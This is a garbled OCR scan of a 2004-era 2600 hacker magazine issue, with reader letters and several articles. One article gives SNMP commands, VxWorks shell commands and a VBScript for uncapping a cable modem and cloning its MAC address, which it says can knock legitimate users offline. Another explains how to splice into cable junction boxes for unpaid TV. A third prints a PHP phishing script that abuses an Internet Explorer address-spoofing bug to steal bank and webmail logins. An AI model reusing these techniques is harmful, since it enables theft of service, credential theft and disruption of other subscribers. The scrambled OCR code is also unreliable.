cuted? Why aren't they tracing him themselves? They
certainly have the ability. There are also all kinds of
clues you can uncover if he is indeed stalking you. such
as why you were selected, things he's made reference
to. hints as to location, etc. But again, if you already
know about his record ( and presumably his name), then
it should be easy for anyone with access to law enforce-
ment to track him down. Without that access it becomes
trickier but by no means impossible. Every case is dif-
ferent which is why we can't give you a surefire answer.
But it sounds to us like you already have something to
go on here.
As for spoofing caller ID. as we've said before it's
quite easy and can be done in a number of different
ways. Unfortunately, people still believe that this infor-
mation is secure and infallible. As your case demon-
strates, it is far from either.
The Power of Ignorance
Dear 2600;
I really wanted to come to HOPE this year and had
thought I had the okay from my parents. But, during
dinner, the subject came up and my grandpa com-
mented. "Oh, you don't want to go to that hacker con-
vention because then the government gels you on their
'list.'" This actually hurt me. I thought that the govern-
ment couldn't do that. They said. "Once they get you on
their list, they blame you for things you didn't have
anything to do with. They can grab hold of you and just
keep you in the questioning room.” I didn't think they
could do that, but I must be wrong. Or maybe my par-
ents have this all mixed up. Then they said. "The gov-
ernment can get a list of the attendees of the
conference." I know you would never release a list of
attendees but they wouldn't believe me. Can you shed a
little light on this subject?
lhe_heretic
We never have done and never would do such a
Page 3d
Shoo Bagazina
' liing. Bui with this kind of attitude, there's no need for
lists or surveillance. Intimidated citizens often do the
work of oppressive regimes with nothing more than
their own fear motivating them. It's so much cheaper
than actually imposing the draconian laws.
Dear 2600:
Hey guys, thought you might like to hear this. 1
used to attend a college campus in the greater
Dallas/Fort Worth area - Tarrant County College,
www.tccd.net. Well, after two semesters there I trans-
ferred to a major university and pretty much got my ass
handed to me. So I chose to transfer back to my original
school. I chose to enroll online just because it is more
convenient. While searching in their mess of a website
I found a link that said "Currenl/Former Students."
When I got to that page it asked for a user ID and pass-
word. Well. I hadn't gone there in a year so I didn't re-
member. I clicked on the link that said "Forgot
Username." All that they require is a Social Security
number and gasp, a last name. This is their security for
valuable student info. Something anyone could break
with a copy of the teacher's role sheet. The role sheet
that the campus hands out to teachers is a student's last
name, first initial, and Social Security number. There’s
nothing about secret questions with secret answers or
information that would only be sent to your e-mail. Just
a security system that any social engineer could easily
break, or better yet anyone with a phone and a Mitnick
book (The Art of Deception is a great book). Also, stu-
dents have their information involuntarily put into this
type of system. This was only the second time that I
used their web page in over a year. 1 had a friend that
attended and graduated over five years ago who was
able to pull up all his personal information. I hope I
don't get in trouble if someone reads this and does
something bad. I might be held liable.
AltSp4c3Ctrl
We're sorry to say this kind of setup is not at all
atypical.
Dear 2600:
I spent four years working as a systems support
specialist for the Black and Decker Corporation's North
American power tools distribution division. These few
years represent my first and last real corporate adven-
ture I will choose to participate directly in. At the be-
ginning I pictured it as a wonderful opportunity to
discover all sons of things about servers and expensive
computing equipment and high-level software. I have
no doubt I learned a lot. The unpaid salaried overtime
rose quickly to the point where on any given month
there might be one to three full Saturday and Sunday
weekend nights to work in addition to the usual five
day work week. I worked on third shift so I had a lot of
lime to write software and create all sorts of data pro-
cessing engines that move information between their
warehouse management system and the intranet file
system to convert raw data into a database that could
hook in with Excel spreadsheets, etc. 1 did lots of inter-
esling things for the company that were not really a part
of my job on paper, but I enjoyed doing them and learn-
ing how I could manipulate information to make the
lives of other people more interesting while they are
sitting at their desks scratching their heads wondering
i “is this possible?"
At the beginning of my experience, our on-site sup- >
port team, which was only a small number of individu-
als, had full access to the SQL Plus program running on
Alpha VMS. Logging in to SQL Plus, we had full ac-
cess to the entire Warehouse Management System
(WMS) database, which keeps all the data responsible
for shipments, picks, locations, transportation, routing,
cube, size, and loads of other information. Basically
any data having to do with tools (Black and Decker.
Dewalt. Craftsmen. Kwikset, and many more) as it
reaches the distribution system for all of N.A. is stored
here.
Time went by and things changed, the information
was moved onto the 64-bit Unix platform and. at that
same time, our shell access was revoked and we were
handed a very easy-to-use, limited, telnet-based system
admin menu, which contained all the things that the
high-level programmers thought we needed to do in or-
der to support the system on-site. Anything else re-
quired a phone call to the corporate support system
where we would be able to contact a member of the
high-level programming group at any hour of the day.
They removed access to the shell but they never
said we couldn't access the database using SQL Plus for
Windows. We just couldn't run it on Unix because we
were locked in a menu. As soon as they revoked our ac-
cess to the command shell, I just switched over to a
Windows client and was able to perform my job from
that entry point. I solved a lot of problems and did a lot
of great things using access to this, and I never used it
in a malicious manner. At one time. I was even able to
create a comprehensive listing of all 250 reports in
WMS, with a primary, secondary, and even third key-
stroke path in the next few columns for each report I
documented. That way if someone heard of a report but
didn't know how to get there inside the complex telnet
menus, they could easily refer to this spreadsheet. The
users were so enthused. I got about ten e-mails from the
management team saying how grateful they were to
have this and how much it made their lives easier.
It pleased me to help people out because the rest of
my support team was full of a bunch of ignorant ass-
holes. It gave me an opportunity to really shine out and
let people know the technical support world is not com-
pletely full of drunks and anal-retentive tetris players.
There is some humanity inside the tech support world,
because I have lived within it.
Being on third shift. I had to wake people up from
time to time. 1 learned when to call and when to wail
until the morning came, but there were always times
where a judgment would be unclear. To avoid political
conflicts and let people sleep. I liked to handle as much
as 1 could without waking someone up. Then if the
coders heard from me at 3 am. they'd know it was really
serious.
I had one instance in the middle of November 2003
where 1 could offer my services using the SQL client
and hopefully fix the problem, or I could wait until the
morning and leave a message for the programmers. 1
thought I'd at least give it a look and see what I could
find, and if 1 couldn't flx it. I might have more informa-
tion to deliver to the people who built the system.
After my analysis the SQL Plus client left an oracle
lock for some reason when the application closed. In
the morning, the highest level programmer found my
Continued on page 48
9 • 3 ~ ^
by CronoS@OlympoS
In this article I will try to show that all is not lost in the uncapping front. If you have a shell
enabled (firmware) cable modem (e.g. Surfboard 2100) or think you can get one (from eBay),
read on. If you want to change your modem to an IP/LLC filtering firewall, read on. I will tell
you how to add filters and change HFC Mac address automatically to a random MAC address
and surf uncapped anonymously.
Disclaimer: Use this knowledge to explore DOCSIS and vx Works OS. Do not use it for
illegal purposes.
Background - A Brief History of Uncapping
I met with broadband services in 1999. When I heard that some company was planning to
offer these services I quickly subscribed as a beta tester. A few days later I started uncapping
with the usual TFTP spoof method (although it was so fast during the test days and there was
no need to uncap, I felt like finding its strong and weak points). Then I accessed the router and
learned "cable qos permission enforce" for increasing speed for a single modem or for all
modems. And also the ISP’s Cisco Network Registrar software with default user/pass (ad-
min/changeme) was there to set better profiles for customers. So when they found a way to
stop (MD5/.cm file) I found another way (removing MD5 with hexedit) to do it. Then they re-
placed their ubr7200 with a 1 2000 router and the MD5 removal thing was history. I sniffed the
network and picked up configuration file names (512k.cm etc.). The fastest I found was a two
megabit file and it had an easily guessed name (2048.cm). It was possible to feed these files to
the modem with tftp. Then they thought if they changed the name to a stupid long filename
with random characters that curious explorers wouldn't find them and use them. Heh, thanks to
the sniffers it was easy to find out names and get them from the tftp server.
So I started using the two megabit file but they were resetting my modem again. First I
thought (like others) that if I could block snmp access then they wouldn't be resetting my mo-
dem. So 1 quickly wrote a perl script to change the snmp community string and management
IP address on the modem. Here's what you need:
OlD=l . 3 . 6 . 1 . 3. 83. 1.2. 1.7.1 Type - inteoer Value= 5 (create filter and wait)
OiD=l. 3. 6. 1.3. S3. 1.2. 1.2.1 Type= IP address Value=x.x.x.x (mgmt Source IP
address)
OXD-2 .3.6.1.3.83.1.2.1.3.1 Type = X PADDRESS Value=x. x.x.x (netmask)
OID=l. 3. 6. 1.3. 83. 1.2. 1.4.1 Type=OCTET_STRING Value=BmCg (new community
string here)
oid=i . 3.6.1.3.83.1.2.1.5.1 Type=iNTEGER value =3 (read write access)
OID^l. 3. 6. 1.3. 83. 1.2. 1.7.1 Type= INTEGER Value=l (activate filter)
If you set these sequentially then no one will be able to reach your modem by snmp. Vic-
tory again. But after four weeks, I found my modem getting reset again. Back to reading doc-
sis documents again. One thing to note, it was always fun to explore this new technology and
learn new things. As I learned, BSP techies learned too and they got better security skills. So
isn't this good for both? Of course, the taste of fast speed was great (if you live in an animal-
named country where the ISP commercial on TV says "Look, the connection is still there,
we're online for hours" #!$%).
Next, I thought if I could block all communication between the modem and CMTS (router)
then they would not know my modem was online. This technique still works in some cities
here. Just read the howtos at cisco.com and create IP/LLC filters with snmp:
Page 10
SbOO Hagazlne
fFrom: Any '
To: your modems HFC IP address
Action: Block
IP Filtering example:
0ID=1 ,3.6.1.3.83,1.6.3.0 Type= INTEGER Value=2 (if an IP packet does not match
this filter then let it pass)
OiD-i .3.6.1.3.93.1.6.4.1.2.1 Type * integer Valuers (create the IP filter table entry
number " 1 " but don’t activate it yet)
010=1.3.6.1.3.83.1.6.4.1.3.1 Type=iNTEGER value=i (all IP packets matching filter
no 1 will be discarded)
010=1.3.6.1.3.83.1.6.4.1.4.1 Type=lNTEGER Value=0 (this filter will be applied to
both interfaces)
010=1.3.6.1.3.83.1.6.4.1.5.1 Type = integer value=3 (this filter applies to inbound
and outbound traffic)
010=1.3.6.1.3.83.1.6.4.1.6.1 Type = integer value=2 (this filter does not only apply
to broadcast and multicast traffic)
OID=l .3.6.1.3.83.1.6.4.1.7.1 Type=IPADDRESS Value=«0 . 0 . 0 . 0" (the source IP
address for this filter - beginning IP - if range)
010=1.3.6.1.3.83.1.6.4.1.8.1 Type = I PADDRESS Value= ” 0 . 0 . 0 . 0" (tile source IP
address for this filter - end IP - if range)
0ID=1. 3. 6. 1.3. 83. 1.6. 4. 1.9.1 Type=I PADDRESS Value=”cm HFC IP" (the
destination IP address for this filter - low)
0ID=1. 3. 6. 1.3. 83. 1.6. 4. 1.10.1 Type=IPADDRESS Value="cm HFC IP" (the
destination IP address for this filter - high)
010=1.3.6.1.3.83.1.6.4.1.11.1 Type = integer Value=256 (this filter matches TCP
packets)
010=1. 3. 6. 1.3. 83. 1.6. 4. 1.12.1 Type= INTEGER Value=0 (source port - low)
0ID=1 .3.6.1.3.83.1.6.4.1.13.1 Type=INTEGER Value=6553S (source port - high)
010=1.3.6.1.3.83.1.6.4.1.14.1 Type = integer Value=o (destination port - low)
010=1.3.6.1.3.83.1.6.4.1.15.1 Type = integer Value=65S35 (destination port - high)
0ID=1. 3. 6. 1.3. 83. 1.6. 4. 1.2.1 Type = INTEGER Value=i (activate the IP filter)
LIiC filtering Example (arp filtering in this example) :
oid=i . 3.6.1.3.83.1.6.1.0 Type = integer Value=2 (2=drop matching, allow
others - I =allow matching, drop others)
oid=i. 3. 6. 1.3. 83. 1.6. 2. 1 . 2.1 Type= integer value=5 (create and wait)
010=1.3.6.1.3.83.1.6.2.1.3.1 Type= INTEGER Value=0 (both interfaces)
OID=l. 3. 6. 1.3. 83. 1.6. 2. 1.4.1 Type= INTEGER Value=l (ethemet protocol)
0ID=1. 3. 6. 1.3. 83. 1.6. 2. 1.5.1 Type = INTEGER Value=20 54 (arp traffic)
010=1 .3.6.1.3.83.1.6.2.1.2.1 Type= INTEGER Value=l (activate filter)
1 wrote a tool to add these rules to the modem easily and will make it public soon.
As 1 moved to a smaller town (where the cable company had less than 1 (K) customers) my
first try was quickly detected and resulted in a "shame on you" telephone conversation. I tried
some other modem I had and they banned its MAC address and it never got online again
(couldn’t get IP for HFC mac and with an IP like 0.0.0.0 it couldn't bind tftp and other stuff).
Another modem, and it got banned too. Well, now it's a challenge. I should find a way. I should
have control over the modem as much as they do. So 1 looked for a modem with shell enabled
firmware. I found one (from eBay) and examined the underlying beautiful vxworks OS. After
two days of hard work I found several ways to change the Mac address of the modem.
The following techniques are for the Surfboard 2100 modem with a shell enabled firmware
(SB2100-1.1.1-SCM-SHELL) :
Check http://192.l68. 100.1/mainhelp.html to see if your modem has a shell enabled
firmware.
^Iprinj BOOH Page 41 ^
First, connect the modem's diagnostic port to your PC's serial port. (I will not go into
details, consult your hardware guru friends.)
Change your PC's IP to tftp server's IP (I will give you a sample script to automate this later
below).
Startup your favorite terminal program (examples are for SecureCrt) and turn on the modem.
You will see something like:
SURFboard Cable Modem - Model SB2100
Cold boot @ OxbfcOOOOO . . .
Running dramTest (32 bit) store/load basic test ... PASSED
VxWorks System Boot
If you see a prompt after
$$ MCNS STARTUP $$
Launching startup. . .
then you are ready to use the commands below:
-> ts tScMain (Suspends the startup script (ts=taskSuspend). You will not be able to
catch tScMain task if not entered quickly - you need a script running terminal program like
SecureCrt.)
-> sysHfcMacAddrSet 3Hfccccccc (0x00, OxDE, OxAD, OxBE, OxEF, 0x01)
-> routeAdd "TFTPserveriP" , "192.168.100.1" (With the help of this you won’t need
to ping the modem for tftp feed.)
-> tr tScMain (Resume startup script.)
-> td tshell (This is needed for later (privileged) shell access - prevents Cli startup,
later just hit Ctrl+C and it will grant you a new ( privileged ) shell.)
After modem gets the .cm file you can revert your IP settings back to DHCP.
The first method I found was using the sysEnetMacAddrSet command. This command is
used to change the ethemet interface's MAC address. But,
-> 1 sysEnetMacAddrSet
0x800a6bac 34c6800a or i a2,a2, 0x800a
-> m 0x800a6bae (enter)
-> 800 a 6 bae: 800 a- (type 8000 and hit enter here - for HFC interface)
- > 800a6bbo 2504 - (just type . and hit enter to quit modifying)
Now if we call sysEnetMacAddrSet (0x00, . . . ) it will set HFC interface's MAC address
instead of ethemet!
I will not list all commands here. All you need is:
lkup "keyword" (lists the commands/functions including keyword - case sensitive (lkup
"reset", lkup "snmp", lkup "SNMP").
With lkup you can find everything and if you’re familiar with assembly just use
-> 1 command/f unction
for further examination.
If you set the MAC address to an already existing MAC address, the modem will be online
with the Class of Services set for that customer and will cause the other (real one) to reset it-
self. When the other (real one) gets online your modem will reset itself and so on. This loop-
ing process may cause a Denial Of Service attack and prevent the legitimate user from
connecting to the net.
Automatic for the People
Examples are for SecureCrt and W2k or XP.
Add the following to startup (create a batch file and add to startup folder or add to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrenCVersion\Run)
C:\Program Files\SecureCrt\securecrt.exe /S sessionname /SCRIPT c:\script.vbs
Copy the script below to c : \script . vbs.
Page V S
■2800 Magazine
f \
* $language = "VBScript "
» ^interface = "2.0"
Dim tavan, taban, rendim, kauntir
Dint sonuc
Dim turns i
Sub setaddr
tumsi = "sysHfcMacAddrSet 3Hfccccccc (0x00"
do while kauntir<6
randomize
rendim = Int ( (tavan - taban + 1) *Rnd + taban)
aonuc= hex (rendim)
rumai = tumsi + "," + "Ox" + aonuc
kauntir = kauntir+1
loop
rumai = tumsi + ") "
End Sub
Do while 2=2
crt . Screen . Synchronous = True
tavan = 255
taban = 27
kauntir = 2
setaddr ()
crt . Screen . WaitForString "Version : "
Set shell = CreateObject ( "WScript . Shell")
shell .Run "netsh interface ip set address "Local Area Connection"
•►Static TFTPSERVERI PHERE 255.255.0.0 TFTPSER VER I PHERE 1"
crt . Screen . WaitForString "
crt . Screen. Send "ts tScMain" & vbCr
crt . Screen . WaitForString *-> "
crt . Screen . Send tumsi & vbCr
crt .Screen. WaitForString "-> "
crt . Screen . Send "routeAdd ”&Chr (34 ) 6, "TFTPSERVERI PHERE "SChr (34) A",
*• "&Chr (34) &" 192 . 168 . 100 . 1 "&Chr (34 ) & vbCr
crt . Screen . Wai tForString "-> "
crt. Screen. Send "tr tScMain" & vbCr
crt. Screen. Wai tForString "-> "
crt . Screen . Send "td tshell" & vbCr
crt. Screen. WaitForString "REGISTRATION SUCCESS"
shell .Run "netsh interface ip set address "Local Area Connection"
•~source=dhcp "
crt . Screen . Synchronous = False
loop
Greetz to 2000 olympians.
V
by J. P. Arnold
Despite what the cable company might
tell you, your premium channels and high-
speed Internet access are not controlled by a
switch hidden inside Adelphia headquarters.
In fact, these services are always running live
inside the mysterious cable junction boxes
that are littered around the average neighbor-
hood or apartment complex. During a recent
service visit, a friendly cable company em-
ployee proved willing to educate me on some
of the simpler aspects of Adelphia’s inner
workings. This article attempts to describe
the interior of the typical apartment complex
cable junctions and provide some rudimen-
tary guidance on the function of the enclosed
hardware. While this information is specific
to Adelphia service regions, potential for
broader application exists.
There are currently two components to the
standard Adelphia residential cable junction
point, here referred to as the "main" and the
"mess." The main is the trunk line connecting
the residence(s) to the Adelphia service web.
It comes out of the ground, appearing as an
unpretentious coaxial cable feed. This feed is
housed in a stand-alone, green metal case ap-
proximately 12 inches high and four inches
square. From the behavior witnessed during
this service call, no special equipment is re-
quired to access this case - aside from a pair
of steel-toed boots.
An ordinary coaxial cable connector joins
this main feed to another metal case - the
"mess" - so named for the appalling spaghetti
of wires inside that dole out bandwidth and
programming to the neighborhood. In this in-
stance, this second box required a special tool
to open, reminiscent of the lock-lugs on a tire
rim. The case is clearly constructed by the
lowest bidder and is vulnerable to any num-
ber of household tools.
The cable jacks inside of the second box
were all carefully labeled to coincide with the
apartments to which they provided service.
As previously mentioned, the wires them-
selves don’t know who is paying for services.
According to the employee, access is pro-
vided or restricted by means of filters. For
those customers who only pay for cable tele-
vision, a filter is placed on the line to prevent
Internet access. While this filter could not be
closely examined, it appeared to be a Model
ETN, EMN. or ESN negative filter, produced
by Eagle Comtronics (www.eaglefilters
•.com). For those who desire only high- '
speed Internet, a multi-channel negative filter I
(probably Eagle’s Model l()M) is placed on
the line to block television signal. Negative
filtration is the process of interrupting signals
to prevent unauthorized use. This supple-
ments the positive filtration device - the cable
box - which removes encryption from signals
so they are readable by the end-user. As a vi-
sual memory aide, Adelphia places a special I
blue tie-wrap on the lines of customers who
have elected to pay for both Internet and tele-
vision programming. These lines have no fil-
ters attached. There may also be metallic
silver tags inside the box; these have been
phased out of use and, according to the tech-
nician, no longer hold significance.
In an apparent effort to sabotage attempts
to tamper with this system, Adelphia employ-
ees supplement this setup by installing a be-
wildering chaos of splitters and splices.
Why? The main cable feed needs to be shared
between all the members of the apartment
building it services - the ones who want just
TV, just Internet, or both. This means that the
main line must be split into three distinct ser-
vice facets and then spliced into the particular
customer’s apartment. In addition to atro-
cious signal toss, this forest of wire provides
ample opportunity for tinkering.
Theoretically, if someone wanted to se-
cure unpaid access to cable television, it
would be a simple matter to run an extra
piece of cable from one of the in-place signal
splitters to the cable jack labeled with your
apartment number. You might choose to con-
nect using either the full-service or the televi-
sion-service-only split. Either will get you
The Sopranos so long as you own a cable
box. This method appears relatively risk-free.
In general, cable technicians do not
know/care who is paying for access in an
apartment complex. Based on this service ,
-St, 0 0 Hagtzina-
call, they also do not care to closely inspect
I he work done by other people - whom they
assume to be authorized individuals - inside
the junction box.
Free high-speed access is somewhat more
difficult. As I write this article, I am not
aware of any method that an unauthorized
user can use to access Adelphia’s high-speed
service without a MAC address interrogation.
If it were possible, however, it would be wise
to first locate a rightful high-speed user by
searching for the blue tag on their cable feed.
When the interruption would not be noticed,
disconnect his/her cable, transfer the blue tie-
wrap to your illicit splice, and then replace all
the connections. This far-from-foolproof
method at least insures that your splicing job
will appear legitimate to casual inspection.
If you need to install a new splitter, use
caution. Any splitter introduces signal loss:
3.5dB for a three-way, 7.0dB for a four-way.
These signal losses are cumulative and, in the
case of an Adclphia high-speed connection,
any loss greater than lOdB renders a connec-
tion useless. A TV signal should not be af-
fected by adding a second or third splitter, but
any Internet connectivity will suffer repeated
dropouts. Remember also that residents fre-
quently split the connection inside their
homes - another potential source of signal
loss and tampering detection. If you, the le-
gitimate user, are experiencing connection
dropouts or a fuzzy TV signal, call your cable
company and request that a technician check
your line for this type of hardware signal
loss.
According to the technician, Adelphia is
planning to consolidate the main and the
mess into one junction box. The technician
seemed to think that this change would alle-
viate some of the spaghetti inside the box. In
any event, the act of consolidation is cer-
tainly a window of detection that unautho-
rized cable users should consider carefully. In
the Colorado area, this migration is sched-
uled to occur "sometime in the next two
years." It may already be underway in some
areas.
This article represents some entry-level
information on Adelphia hardware and
service procedures. It can be used to add to
the reader's knowledge. It should be used
responsibly.
Non-Secure
Login Forms
by I. O. Hook
On December 9th, Secunia (http://www.se
•cunia.com) released details on yet another
Internet Explorer vulnerability. This one al-
lowed malicious web site owners to spoof
what appears in the Address: blank of IE 5, 5.5.
and 6.
The vulnerability was caused due to an in-
put validation error, which can be exploited by
including the "% 0 \" and "%00” URL encoded
representations after the username and right
before the character in a URL.
Successful exploitation allows a malicious
person to display an arbitrary FQDN (Fully
Qualified Domain Name) in the address and
status bars, which is different from the actual
location of the page.
This bug, combined with the effects of lazy
site operators who hang their login forms out
on non-secure web pages and ignorant users
who depend on third-party link lists or trust
URLs they receive in their e-mail, can really
add up to disaster.
Microsoft issued a patch for IE on January
13th. But diis little bit of PHP shows just how
easy it was (and still is on unpatched browsers)
to grab logins and passwords.
If you're a user, don't use IE. If you must,
never trust a link from a web site or (even
worse) your e-mail. For best results, type the
URL into the Address blank, by hand, every
time.
If you're an operator, please put your login
form on a secure page and don't leave it hang-
ing in the breeze for unscrupulous middlemen
to mirror and possibly exploit.
This demonstration should be used for edu-
cational purposes only; researching the legal
ramifications of actually grabbing passwords
with this exploit are left as an exercise for die
student.
[see gotcha.php, attached]
Spring S 0 0 V
Page VS
will work
$dest [] -"Slashdot" ;
$link [j «"http://www. slashdot .org" ;
$dest l] »"Kuro5hin" ;
$ 1 ink [ ] « "ht tp : / /www . kuroShin . org " ;
$dest [] -"Yahoo! " ;
$link [] -"http: //my . yahoo.com" ;
$dest [j ="America On-Line" ;
$link[] -"http://www.aol.com";
$dest [] -"NetZero" ;
$link[] -"http: //webmail .netzero.net" ;
$dest [] -"Wells Fargo Bank";
$link [] -"http://wwW.wellsfargo.com" ;
$dest [) -"Neverwinter Nights";
$link U -"http : //nwn . bioware . com" ;
# has somebody submitted our form?
if (isset ($the_8ite_you_really_wanted) )
print "\n" ;
print "Be afraid. Be very afraid. \n" ;
print "\n"?
print "You just gave me your login and password for the following Web
print "
\n";
print "
\n";
foreach ($ POST as $k -> $v)
{
print “«li»$k: $v $v)
(
print ”Sk: Sv\n";
print "Have a nice day ! \n" ;
print "\n" ,•
exit ;
# if one of our links was not submitted, print the list of links
if (1 isset <$p))
print "\n" ;
print “Useful Links\n"j
$i-0 ;
foreach ($dest as $c)
St . Slink [$i! . *t#l%00«* . S_SERVER [' SERVER NAME' ] . SPHPSELP . *?p-’
print "$dest [$i] < Ai>\n" ;
$i++;
)
print "
\n " ;
print "\n" ;
else
(
# here we go ... some eager sucker has followed one of our links
# first, parse the URL in case we need to supply a base href later
Surl . parse_url ($p) ;
$base_href = $url [scheme] . *://” . $url [host] . •/";
# go grab the page
Shandle ■ fopen ($p, "r”);
Scontenta - * " ;
do {
Schunk = fread( Shandle, 8192) ;
if (strlen (Schunk) «« 0) {
break ,•
D . • .
U I
4
a l n n H . .
site: \n ” i
. Slink CSili
Scontents .= $chunk ;
) while (true);
f close (Shandle) ;
# stick it all in $data
Sdata = explode (”\n" , Scontents);
# go through $data line by line
for ( $ i = 0 ; Si
if (isset ($in_forra) && $in_form)
{
# we're in the form
if (stristr (Sdata t$i] , "type") && stristr ($data l$i) , “password"))
(
# we've found the password blank
$found_password = 1 j
if (stristr (Sdata [$i) , "< input type-\ "hidden\ " name-\"the_
•»site_you_really_wanted\" value*\"$p\"»" ;
# dump the compromised page to the client's browser
foreach (Sdata as Sline)
print "Sline";
print "\n";
if (stristr (Sline, "chead") && I isset (Sfound base href))
print "\n" ;
Continued from page 39
user name attached to the oracle lock alongside
SQLPLUSW.EXE and he flipped out. Two hours after I
left work. I tried to login to the web-based e-mail appli-
cation and 1 saw my account was disabled. Two hours
later, my account was deleted. I got no voicemail mes-
sages. so I came in to work that night as usual. When I
walked through the door, the security guard told me I
was not allowed to be inside the building and offered
no explanation why.
The next morning 1 heard the lowdown from my
manager and he said the programmers thought of me as
a security risk and they wanted me out of there immedi-
ately. They changed all the passwords for almost every
server and application around, and terminated me right
then and there.
1 wanted to tell you this story because I feel it's im-
portant to communicate this sort of security paranoia
that is plaguing America and perhaps the rest of the
world today. I never hurt a soul inside that place. I
fought Nimda and all sorts of other viruses with the
best of them. I reported security problems and was kind
to end-users over all the building, no matter how much
knowledge they had. All 1 wanted to do was learn and
experience computing in an environment where there
were resources available to see things I would not be
able to afford to buy on my own. They are very inse-
cure and because they knew that I wasn't just a droid
who stayed up all night and escalated technical prob-
lems. I became a threat in their mind. So the real prob-
lem in corporate America is still just plain old
ignorance.
Thanks for a great magazine. I have faith.
John Anon
Dear 2600:
I've been going to school for the past 12 years and
I'm currently a junior at York Community High School
(www.elmhurst.kl2.il.us/schools/york/york.html) in
Elmhurst, Illinois - a moderately priced suburb almost
15 miles due west of Chicago. 1L. During my lime in
the public school system, it's come to my attention that
Lhere have been serious impediments of the free pursuit
of information within the public school system. The
school administration and teachers have been involved
with blocking information that is informative, simply
to avoid the risk of studenLs learning information that is
bad. At our school, there's a piece of software installed
called "WebSense" on a certain server on our network.
All website queries are passed through this server, and
URLs containing certain key terms such as "phrack"
are blocked from access. Computers in the library are
constantly monitored for any activity that may be inter-
preted as unacceptable. The school library is restricted
to schoolwork only and we're limited from learning
anything extra (I once got in trouble for learning pro-
gramming during a busy period in the library). In the
information age, we should sometimes ask ourselves.
"If our country's defense involves knowledge that may
do good or evil, then why shouldn't our personal
defense involve this knowledge as well?" The answer
seems to me to be simple - our country wants
unrestricted rights over their citizens.
thesuavel
Knowledge is power and this certainly shows how
much it's feared, even in an environment that suppos-
edly fosters it. But one thing this isn't is unusual.
V
Dear 2600: \
A friend of mine pointed to my 2600 Magazine and
said. "You know you can get anested for having that."
It's a sad day in America.
sunami
It’s only sad if you listen to the doomsayers. Be
happy and fight.
Dear 2600:
During the recent snowstorms, one of the local
news channels used a website to allow people to post
business closings. A group of people affiliated with my
university decided it would be fun to submit fake (often
vulgar) business closings. Anyway, when this was in
the newspaper the next week I overheard studenLs in
one of my courses talking about how the site had been
hacked.. Using a public form on a website hardly seems
like "hacking" to me.
ieMpleH
Dear 2600:
The other day I was about to go out wardriving with
my laptop when I picked up a network before leaving
my driveway. Problem was. it was encrypted. Damn. 1
thought. But 1 was bored so I decided to mess around. I
put 00000000 as the network key and pressed OK.
Much to my surprise, it worked! I had connected to my
neighbor's "encrypted" network. Shows that there
really is no patch for human stupidity.
mord
Tips
Dear 2600:
In 20:3; you responded to a letter saying that some-
one got Final Cut Pro for $50. 1 just wanted to note that
companies like Apple and Microsoft give out educa-
tional discounts. For the latest version of Final Cut Pro.
you can get it at 500 dollars at the educational discount.
How do you get this educational discount legally?
Easy, go to a community college, register for the cheap-
est class, buy the software, and then drop the class you
registered. If the class is refundable, great! You just
saved a lot of money by buying a piece of software
legally that would have cost you much more if you
were an average customer.
College_Student
This doesn't address the original point of someone
being forced to go the pirate route because of the lack
of any guarantee that the software would actually work
under a certain configuration. It's an example of the
lack of support directly affecting sales.
Meeting Trouble
Dear 2600:
1 went to the Buffalo meeting this month that's sup-
posed to be at the Food Court over at the Galleria Mall
(which is actually in Checktowaga). Nobody was there
for any 2600 meeting. I've asked around and this has
been going on for almost a year now. What do you (and
we) do when something like this happens?
I'd just like point out that Galleria Mall is way off in
the burbs and almost totally inaccessible by public
transportation. It's pretty much only accessible by car.
I'm trying to organize people to go but it's hard without
the transportation support. Could it possibly be moved
to something really easily accessible? Boulevard Mall
P a g a Hi
SbOO Hagazine
is much closer to Buffalo and the surrounding areas and
very easily accessible by public transportation. Not
only that but it's only five minutes from the local col-
lege campus - University at Buffalo North Campus.
Tell me what I need to do to get this set in motion.
Kaosaur
The best way to achieve this is to first determine
that the meetings aren't gtting on as advertised. Since
vours is one of many such letters we've received on this
particular location and since vie haven't gotten an up-
date from this meeting in a white, we've delisted it. This
means you're free to pursue starting up the meeting at a
new site. We suggest conferring with others on this as
the last thing you want is a divided group that can't de-
cide where to meet. When you have a consensus, be
sure to send us updates (to meetings < Import With Quicktime and
select your downloaded song.
4. Save as a WAV or comparable file type.
5. Import the WAV into iTunes
6. Select the WAV in iTunes and choose
Advanced > Convert Selection to AAC/MP3/
whatever file type you have chosen as the
default codec.
This is reminiscent of the old days of MP3
encoding that involved a manual two step
process using different programs to rip and
then encode. While tools that reduce this
process to one click will undoubtedly evolve
and become more common, this method is
useful because of its simplicity and interesting
because of its irony.
SLOO Aigirini — '
U.S. Individual Income Tax Return
Vonage Broadband
Phone Service
by Kevin T. Blakley
As a 1 5 year security professional and Von-
age phone service user over the past six months,
I have uncovered some serious security prob-
lems with its use and solutions to possible secu-
rity risks for both business and home users. This
broadband phone service which saves the end
user hundreds or even thousands of dollars a
year on local toll and long distance charges can
pose certain vulnerabilities to your network. The
service, which uses Cisco's VOIP ATA- 186 tele-
phone adapter, opens several holes in network
security.
Vonage offers little help with serious techni-
cal or security issues and in fact several techni-
cal representatives stated to me that I should
simply allow all traffic on the following ports
(UDP: 53 (domain), 69 (tftp), 123 (sip), 5060,
5061, and 10000 fi 20000) into my secured local
network for any source IP. There are many ex-
ploits for all of these ports which include ex-
ploits for tftp on port 69, computer management
on port 10000, and others. Vonage refuses to
provide their source IP's for the VOIP connec-
tions. Given this information one could easily
set up firewall rules which would allow traffic
only from Vonage's VOIP server addresses to the
voice unit. Service redirection which is known
to most seasoned firewall users allows the fire-
wall to map user defined ports to a predefined lo-
cal or private IP address. This, while not
suggested by Vonage, would suffice in securing
ihe local private network and also provide secu-
rity to the ATA unit. What was suggested by
Vonage was the placement of the ATA- 186 into a
DMZ firewall zone. While this offers some log-
ging ability for attempted attacks, it opens up the
ATA unit itself to possible attacks via the open
service ports mentioned above, specifically tftp,
and a service that is normally turned off: http
(port 80). Since broadband Internet service is to-
day almost as common as a television and with
broadband phone service providers such as Von-
age gaining popularity, it is the responsibility of
security professionals such as myself to provide
information to the general public relating to se-
curity threats.
Personal firewalls such as the one provided
in Windows XP and the many variants on the
market protect the computer on which they are
installed from various attacks. However they do
not protect any other device which is on the
same network connected through a broadband
router. Many of the most popular broadband
router/firewalls on the market today do offer
some packet filtering but most do not inspect
UDP traffic which is what the ATA- 186 voice
unit uses to communicate VOIP traffic.
For those home or business users who do not
employ a firewall on the front end of their net-
work. I would suggest doing so and employing
stateful! packet inspection of all traffic relating
to the use of any VOIP device. Such small office
and home products arc available from many
manufacturers such as Check Point, Watch-
